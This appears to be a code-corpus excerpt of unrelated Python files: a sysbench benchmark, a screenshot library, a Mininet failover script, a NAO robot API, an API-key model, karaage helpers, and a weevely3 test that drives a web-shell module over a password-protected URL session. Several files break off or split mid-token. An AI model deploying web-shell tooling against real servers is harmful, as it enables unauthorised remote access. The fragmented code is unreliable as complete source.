'8': 'db.m3.2xlarge',
'16': 'db.r3.4xlarge', # m3 series doesn't have 16 core.
}
RDS_DB_ENGINE = 'MySQL'
RDS_DB_ENGINE_VERSION = '5.6.23'
RDS_DB_STORAGE_TYPE_GP2 = 'gp2'
# Storage IOPS capacity of the DB instance.
# Currently this is fixed because the cloud provider GCP does not support
# changing this setting. As soon as it supports changing the storage size, we
# will expose a flag here to allow caller to select a storage size.
# Default GCP storage size is 1TB PD-SSD which supports 10K Read or 15K Write
# IOPS (12.5K mixed).
# To support 12.5K IOPS on EBS-GP, we need 4170 GB disk.
RDS_DB_STORAGE_GP2_SIZE = '4170'
# A list of status strings that are possible during RDS DB creation.
RDS_DB_CREATION_PENDING_STATUS = frozenset(
['creating', 'modifying', 'backing-up', 'rebooting'])
# Constants defined for Sysbench tests.
RAND_INIT_ON = 'on'
DISABLE = 'disable'
UNIFORM = 'uniform'
OFF = 'off'
MYSQL_ROOT_USER = 'root'
MYSQL_ROOT_PASSWORD_PREFIX = 'Perfkit8'
MYSQL_PORT = '3306'
NORMAL_SYSBENCH_PATH_PREFIX = '/usr'
PREPARE_SCRIPT_PATH = '/share/doc/sysbench/tests/db/parallel_prepare.lua'
OLTP_SCRIPT_PATH = '/share/doc/sysbench/tests/db/oltp.lua'
SYSBENCH_RESULT_NAME_DATA_LOAD = 'sysbench data load time'
SYSBENCH_RESULT_NAME_TPS = 'sysbench tps'
SYSBENCH_RESULT_NAME_LATENCY = 'sysbench latency'
NA_UNIT = 'NA'
SECONDS_UNIT = 'seconds'
MS_UNIT = 'milliseconds'
# These are the constants that should be specified in GCP's cloud SQL command.
DEFAULT_BACKUP_START_TIME = '07:00'
GCP_MY_SQL_VERSION = 'MYSQL_5_6'
GCP_PRICING_PLAN = 'PACKAGE'
RESPONSE_TIME_TOKENS = ['min', 'avg', 'max', 'percentile']
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
class DBStatusQueryError(Exception):
pass
def _GenerateRandomPassword():
""" Generates a random password to be used by the DB instance.
Args:
None
Returns:
A string that can be used as password to a DB instance.
"""
return '%s%s' % (MYSQL_ROOT_PASSWORD_PREFIX, str(uuid.uuid4())[-8:])
def ParseSysbenchOutput(sysbench_output, results, metadata):
"""Parses sysbench output.
Extract relevant TPS and latency numbers, and populate the final result
collection with these information.
Specifically, we are interested in tps numbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times[token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p%s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_na
|
eric-stanley/robotframework
|
src/robot/libraries/Screenshot.py
|
Python
|
apache-2.0
| 13,020
| 0.000998
|
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
if sys.platform.startswith('java'):
from java.awt import Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
"""Configure where screenshots are saved.
If `screenshot_directory` is not given, screenshots are saved into
same directory as the log file. The directory can also be set using
`Set Screenshot Directory` keyword.
Examples (use only one of these):
| =Setting= | =Value= | =Value= | =Value= |
| Library | Screenshot | | # Default location |
| Library | Screenshot | ${TEMPDIR} | # System temp |
"""
self._given_screenshot_dir = self._norm_path(screenshot_directory)
self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
if not path:
return path
|
return os.path.normpath(path.replace('/', os.sep))
@property
def _screenshot_dir(self):
return self._given_screenshot_dir or self._log_dir
@property
def _log_dir(self):
variables = BuiltIn().get_variables()
outdir = variables['${OUTPUTDIR}']
log = variables['${LOGFILE}']
|
log = os.path.dirname(log) if log != 'NONE' else '.'
return self._norm_path(os.path.join(outdir, log))
def set_screenshot_directory(self, path):
"""Sets the directory where screenshots are saved.
It is possible to use `/` as a path separator in all operating systems.
Path to the old directory is returned.
The directory can also be set in `importing`.
"""
path = self._norm_path(path)
if not os.path.isdir(path):
raise RuntimeError("Directory '%s' does not exist." % path)
old = self._screenshot_dir
self._given_screenshot_dir = path
return old
def take_screenshot(self, name="screenshot", width="800px"):
"""Takes a screenshot in JPEG format and embeds it into the log file.
Name of the file where the screenshot is stored is derived from the
given `name`. If the `name` ends with extension `.jpg` or `.jpeg`,
the screenshot will be stored with that exact name. Otherwise a unique
name is created by adding an underscore, a running index and
an extension to the `name`.
The name will be interpreted to be relative to the directory where
the log file is written. It is also possible to use absolute paths.
Using `/` as a path separator works in all operating systems.
`width` specifies the size of the screenshot in the log file.
Examples: (LOGDIR is determined automatically by the library)
| Take Screenshot | | | # LOGDIR/screenshot_1.jpg (index automatically incremented) |
| Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | ${TEMPDIR}/mypic | | # /tmp/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always uses this file) |
| Take Screenshot | images/login.jpg | 80% | # Specify both name and width. |
| Take Screenshot | width=550px | | # Specify only width. |
The path where the screenshot is saved is returned.
"""
path = self._save_screenshot(name)
self._embed_screenshot(path, width)
return path
def take_screenshot_without_embedding(self, name="screenshot"):
"""Takes a screenshot and links it from the log file.
This keyword is otherwise identical to `Take Screenshot` but the saved
screenshot is not embedded into the log file. The screenshot is linked
so it is nevertheless easily available.
"""
path = self._save_screenshot(name)
self._link_screenshot(path)
return path
def _save_screenshot(self, basename, directory=None):
path = self._get_screenshot_path(basename, directory)
return self._screenshot_to_file(path)
def _screenshot_to_file(self, path):
path = self._validate_screenshot_path(path)
logger.debug('Using %s modules for taking screenshot.'
% self._screenshot_taker.module)
try:
self._screenshot_taker(path)
except:
logger.warn('Taking screenshot failed: %s\n'
'Make sure tests are run with a physical or virtual display.'
% utils.get_error_message())
return path
def _validate_screenshot_path(self, path):
path = utils.abspath(self._norm_path(path))
if not os.path.exists(os.path.dirname(path)):
raise RuntimeError("Directory '%s' where to save the screenshot "
"does not exist" % os.path.dirname(path))
return path
def _get_screenshot_path(self, basename, directory):
directory = self._norm_path(directory) i
|
ardhipoetra/SDN-workbench
|
sch3.py
|
Python
|
gpl-2.0
| 3,578
| 0.044159
|
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
HOSTS = 3
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.insert_rule(rule)
def unClosePort(port):
rule=iptc.Rule()
rul
|
e.protocol = "tcp"
matc
|
h = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.delete_rule(rule)
def myNet():
global p1
global p2
global p3
global p4
cPort1=6666
cPort2=6667
hosts=[]
kill = 0
net = Mininet( topo=None, build=False, autoSetMacs=True)
con1 = net.addController( 'c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
con2 = net.addController( 'c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
for x in range(0, HOSTS):
hostname = "h%d" %(x)
switchname = "s%d" %(x)
host = net.addHost(hostname)
switch = net.addSwitch(switchname)
if (x!=0):
net.addLink(switch, lastswitch)
lastswitch = switch
net.addLink(host,switch)
net.build()
switch.start([con1,con2])
hosts.append(host)
net.start()
tping = time.time()
print 'h0 ping : %.10f' % tping
hosts[0].cmdPrint('hping3 -c 200 -i u20000 ',hosts[1].IP(),' > logs-example/log.ping12.txt 2>&1 &')
#20ms every ping * 200 -> 4s
while True:
tcur = time.time()
if tcur - tping > 2: # after 2s running
# print 'SET ROLE C1 SLAVE '
# p1.stdin.write("import pox.openflow.nicira as nx\n")
# p1.stdin.write("for connection in core.openflow.connections:\n")
# p1.stdin.write("\tconnection.send(nx.nx_role_request(slave='true'))\n")
# p1.stdin.write('\n')
print 'close port %i in %.10f' %(cPort1,tcur)
closePort(cPort1)
break
print 'START C2 AS MASTER at %.10f' %time.time()
p2 = subprocess.Popen(['pox/pox.py',"master67"],stdin=subprocess.PIPE, stdout=p2_log,stderr=p2_log,preexec_fn=os.setpgrp)
while True:
p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"], stdout=subprocess.PIPE)
output, err = p.communicate()
f = StringIO.StringIO(output)
reader = csv.reader(f, delimiter=',')
rownum = 0
con66 = [] # not using this for now
con67 = []
for row in reader:
uuid = row[0]
target = row[15]
role = row[13]
i = target.find(str(cPort2))
if i != -1:
if (role == 'master'):
con67.append(uuid)
f.close()
if len(con67) == HOSTS:
uptime = time.time()
print 'new master ready at %.10f' %uptime
break
print 'now wait for hping3 to finish..'
hosts[0].cmdPrint('wait %hping3')
print 'hping3 finished at %.10f' %time.time()
print 'open the port..'
unClosePort(cPort1)
print 'stopping mininet'
net.stop()
print 'stopping pox(s)..'
p1.terminate()
p2.terminate()
print 'timestamp difference %.10f' %(uptime-tcur)
if __name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os.setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate()
|
davesnowdon/nao-recorder
|
src/main/python/fluentnao/nao.py
|
Python
|
gpl-2.0
| 10,366
| 0.006946
|
'''
Created on 31st October , 2012
@author: Don Najd
'''
import logging
from naoutil.naoenv import NaoEnvironment, make_environment
from fluentnao.core.arms import Arms
from fluentnao.core.elbows import Elbows
from fluentnao.core.feet import Feet
from fluentnao.core.hands import Hands
from fluentnao.core.head import Head
from fluentnao.core.joints import Joints
from fluentnao.core.legs import Legs
from fluentnao.core.wrists import Wrists
from fluentnao.core.leds import Leds
from fluentnao.core.audio import Audio
from fluentnao.core.naoscript import NaoScript
import almath
import math
import time
from datetime import datetime, timedelta
class Nao(object):
# init method
def __init__(self, env, log_function=None):
super(Nao, self).__init__()
# jobs for threading
self.jobs = []
# set motion proxy & log
self.env = env
self.log_function = log_function
if not log_function:
self.logger = logging.getLogger("fluentnao.nao.Nao")
# joints
self.joints = Joints()
self.chains = self.joints.Chains
# other
self.naoscript = NaoScript(self)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
if (self.log_function):
self.log_function(str(datetime.now()) + "|" + msg)
else:
self.logger.debug(str(datetime.now()) + "|" + msg)
###################################
# text to speech
###################################
def say(self, text):
self.env.tts.post.say(text)
return self;
def say_and_block(self, text):
self.env.tts.say(text)
return self;
def wait(self, seconds):
time.sleep(seconds)
return self;
###################################
# Postures
###################################
def stand_init(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
taskId = self.env.robotPosture.post.goToPosture("StandInit", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit_relax(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
taskId = self.env.robotPosture.post.goToPosture("SitRelax", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand_zero(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
taskId = self.env.robotPosture.post.goToPosture("StandZero", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_belly(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_back(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBack", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
self.env.robotPosture.goToPosture("Stand", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
def crouch(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
taskId = self.env.robotPosture.post.goToPosture("Crouch", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("S
|
it", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
|
def stiff(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 1.0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
def rest(self):
self.env.motion.rest()
return self;
def relax(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
self.log("wbDisable")
isEnabled = False
self.env.motion.wbEnable(isEnabled)
def whole_body_enable(self):
self.log("wbEnable")
isEnabled = True
self.env.motion.wbEnable(isEnabled)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
# Legs are constrained fixed
# supportLeg: Legs, LLeg or RLeg
# stateName: Fixed, Plane or Free
self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
# Constraint Balance Motion / Support Polygon
# supportLeg: Legs, LLeg or RLeg
isEnable = True
self.env.motion.wbEnableBalanceConstraint(isEnable, supportLeg)
def balance(self, leg, duration):
duration = self.determine_duration(duration)
# stiffen body
self.stiff()
self.whole_body_endable()
self.foot_state()
self.constrain_motion()
# Com go to LLeg
supportLeg = leg
self.env.motion.wbGoToBalance(supportLeg, duration)
self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
self.globalDuration = durationInSeconds
return self;
def determine_duration(self, durationInSeconds):
if durationInSeconds > 0:
return durationInSeconds
return self.globalDuration
###################################
# blocking
###################################
def go(self):
for taskId in self.jobs:
self.log("taskId=%s|action=wait" % (taskId))
d1 = datetime.now()
self.env.motion.wait(taskId, 8000)
d2 = datetime.now()
r = d2 - d1
self.log("taskId=%s|action=done|seconds=%s" % (taskId, r.total_seconds()))
self.jobs[:] = []
self.log("done")
return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
# motion w/ blocking call
taskId = self.env.motion.post.angleInterpolation(chain, angleListInRadians, timeListInSeconds, True)
# log
self.log("|taskId=%s|chain=%s|angleList=%s" % (taskId, chain, angleListInRadians))
self.jobs.append(taskId)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
# convert to radians
angleInRadians = angleInDegrees * almath.TO_RAD
# move
self.move(jointName, [angleInRadians], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
# Get the Number of Joints
numBodies = len(self.env.motion.getJointNames(chain))
# We prepare a collection of float
|
aviarypl/mozilla-l10n-addons-server
|
src/olympia/api/models.py
|
Python
|
bsd-3-clause
| 3,638
| 0
|
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from
|
olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_
|
compatible
class APIKey(ModelBase):
"""
A developer's key/secret pair to access the API.
"""
id = PositiveAutoField(primary_key=True)
user = models.ForeignKey(UserProfile, related_name='api_keys')
# A user can only have one active key at the same time, it's enforced by
# a unique db constraint. Since we keep old inactive keys though, nulls
# need to be allowed (and we need to always set is_active=None instead of
# is_active=False when revoking keys).
is_active = models.NullBooleanField(default=True)
type = models.PositiveIntegerField(
choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
key = models.CharField(max_length=255, db_index=True, unique=True)
# TODO: use RSA public keys instead? If we were to use JWT RSA keys
# then we'd only need to store the public key.
secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')
class Meta:
db_table = 'api_key'
unique_together = (('user', 'is_active'),)
def __str__(self):
return (
u'<{cls} user={user}, type={type}, key={key} secret=...>'
.format(cls=self.__class__.__name__, key=self.key,
type=self.type, user=self.user))
@classmethod
def get_jwt_key(cls, **kwargs):
"""
Return a single active APIKey instance for a given user or key.
"""
kwargs['is_active'] = True
return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)
@classmethod
def new_jwt_credentials(cls, user):
"""
Generates a new key/secret pair suitable for symmetric JWT signing.
This method must be run within a db transaction.
Returns an instance of APIKey.
"""
key = cls.get_unique_key('user:{}:'.format(user.pk))
return cls.objects.create(
key=key, secret=cls.generate_secret(32),
type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)
@classmethod
def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
if try_count >= max_tries:
raise RuntimeError(
'a unique API key could not be found after {} tries'
.format(max_tries))
key = '{}{}'.format(prefix, random.randint(0, 999))
if cls.objects.filter(key=key).exists():
return cls.get_unique_key(prefix, try_count=try_count + 1,
max_tries=max_tries)
return key
@staticmethod
def generate_secret(byte_length):
"""
Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptography.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
if byte_length < 32: # at least 256 bit
raise ValueError(
'{} is too short; secrets must be longer than 32 bytes'
.format(byte_length))
return force_text(binascii.b2a_hex(os.urandom(byte_length)))
|
epinna/weevely3
|
tests/test_file_bzip2.py
|
Python
|
gpl-3.0
| 5,554
| 0.009903
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
# Create and bzip2 binary files for the test
binstring = [
b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
]
uncompressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
]
compressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
]
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
chown www-data: -R "$BASE_FOLDER/"
""".format(
config = config
), shell=True)
self.run_argv = modules.loaded['file_bzip2'].run_argv
def test_compress_decompress(self):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[0]]))
|
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Recompress it keeping the original file
self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
# Check the e
|
xistance of the original file and remove it
subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
#Do the same check
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
def test_compress_decompress_multiple(self):
for index in range(0, len(self.compressed)):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[index]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
@log_capture()
def test_already_exists(self, log_captured):
# Decompress keeping it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Do it again and trigger that the file decompressed already exists
self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping decompressing" % self.uncompressed[0])
# Compress and trigger that the file compressed already exists
self.assertIsNone(self.run_argv([self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping compressing" % self.compressed[0])
@log_capture()
def test_wrong_ext(self, log_captured):
# Decompress it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Decompress the decompressed, wrong ext
self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"Unknown suffix, skipping decompressing")
@log_capture()
def test_unexistant(self, log_captured):
# Decompress it and check test file
self.assertIsNone(self.run_argv(["--decompress", 'bogus']));
self.assertEqual(log_captured.records[-1].msg,
"Skipping file '%s', check existance and permission" % 'bogus')
|
Karaage-Cluster/karaage
|
karaage/common/__init__.py
|
Python
|
gpl-3.0
| 5,700
| 0
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
if default_start is None:
default_start = datetime.date.today() - datetime.timedelta(days=90)
if default_end is None:
default_end = datetime.date.today()
today = datetime.date.today()
if 'start' in request.GET:
try:
years, months, days = request.GET['start'].split('-')
start = datetime.datetime(int(years), int(months), int(days))
start = start.date()
except ValueError:
start = today - datetime.timedelta(days=90)
else:
start = default_start
if 'end' in request.GET:
try:
years, months, days = request.GET['end'].split('-')
end = datetime.datetime(int(years), int(months), int(days))
end = end.date()
except ValueError:
end = today
else:
end = default_end
return start, end
def get_current_person():
user = get_current_user()
if user is None:
return None
if not user.is_authenticated:
return None
return user
class log():
def __init__(self, user, obj, flag, message):
warnings.warn("Calling karaage.common.log directly has been"
" deprecated. You should use the API "
"log.(add|change|field_change|delete|comment)",
DeprecationWarning)
LogEntry.objects.log_object(obj, flag, message, user)
@classmethod
def add(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, ADDITION, message, user)
@classmethod
def change(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, CHANGE, message, user)
@classmethod
def field_change(cls, obj, user=None, field=None, new_value=None):
return LogEntry.objects.log_object(
obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)
@classmethod
def delete(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, DELETION, message, user)
@classmethod
def comment(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, COMMENT, message, user)
def new_random_token():
import random
from hashlib import sha1
# Use the system (hardware-based) random number generator if it exists.
if hasattr(random, 'SystemRandom'):
randrange = random.SystemRandom().randrange
else:
randrange = random.randrange
max_key = 18446744073709551616 # 2 << 63
string = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
return sha1(string.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
resul
|
t = QueryDict("", mutable=True)
result['content_type'] = ContentType.objects.get_for_model(obj).pk
result['obj
|
ect_id'] = obj.pk
url = reverse('kg_log_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
def add_comment(request, breadcrumbs, obj):
assert obj is not None
assert obj.pk is not None
form = CommentForm(
data=request.POST or None, obj=obj,
request=request, instance=None)
if request.method == 'POST':
form.save()
return HttpResponseRedirect(obj.get_absolute_url())
return render(
template_name='karaage/common/add_comment.html',
context={
'form': form, 'obj': obj,
'breadcrumbs': breadcrumbs,
},
request=request)
def is_admin(request):
if settings.ADMIN_IGNORED:
return False
if not request.user.is_authenticated:
return False
return request.user.is_admin
def get_app_modules(name):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
